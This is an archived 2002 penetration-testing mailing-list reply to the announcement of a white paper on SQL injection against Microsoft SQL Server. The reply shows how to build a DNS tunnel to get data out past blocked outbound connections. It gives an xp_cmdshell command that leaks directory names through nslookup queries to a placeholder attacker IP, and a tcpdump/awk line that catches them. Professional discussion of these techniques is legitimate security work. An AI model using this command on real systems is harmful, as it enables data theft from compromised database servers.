Penetration Testing mailing list archives
Re: Manipulating Microsoft SQL Server Using SQL Injection (+ DNS Tunnels) (fwd)
From: Haroon Meer <haroon () sensepost com>
Date: Tue, 3 Sep 2002 12:07:00 +0200 (SAST)
Hi. Nice paper :> We have found that outgoing connections are almost always blocked (especially from SQL servers that are a little deeper in the DMZ than the 'net facing webservers). (DNS requests often slip by) If you can execute commands remotely (through ur xp_ of choice) then you can use batch commands to throw together a simple DNS tunnel. Example.. -snip- exec master..xp_cmdshell 'for /F "usebackq tokens=1,2,3,4*" %i in (`dir c:\*.`) do (nslookup %l. YOUR_IP_HERE)' Running a sniffer on host YOUR_IP_HERE (with an awk / split or two) Wh00t:~# tcpdump -l dst YOUR_IP_HERE and port 53 | awk '{print $7}' . WINNT. tools. bytes -snip- If outgoing dns isnt allowed directly, you can still have some joy requesting %variable.DOMAIN_U_CAN_SNIFF.com and letting it follow its DNS path.. ====================================================================== Haroon Meer MH SensePost Information Security +27 83786 6637 PGP : http://www.sensepost.com/pgp/haroon.txt haroon () sensepost com ====================================================================== On Wed, 28 Aug 2002, Aaron C. Newman wrote:
Hi All, I just posted a short white paper on Microsoft SQL Server and SQL Injection titled "Manipulating Microsoft SQL Server Using SQL Injection" at: http://www.appsecinc.com/news/briefing.html#inject14 The paper was written and researched by Cesar Cerrudo (sqlsec () yahoo com). All comments are welcome. Regards, Aaron _______________________________ Aaron C. Newman anewman () appsecinc com CTO/Founder Application Security, Inc. www.appsecinc.com Phone: 212-490-6022 Fax: 212-490-6456 - Protection Where It Counts -
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Re: Manipulating Microsoft SQL Server Using SQL Injection (+ DNS Tunnels) (fwd) Haroon Meer (Sep 02)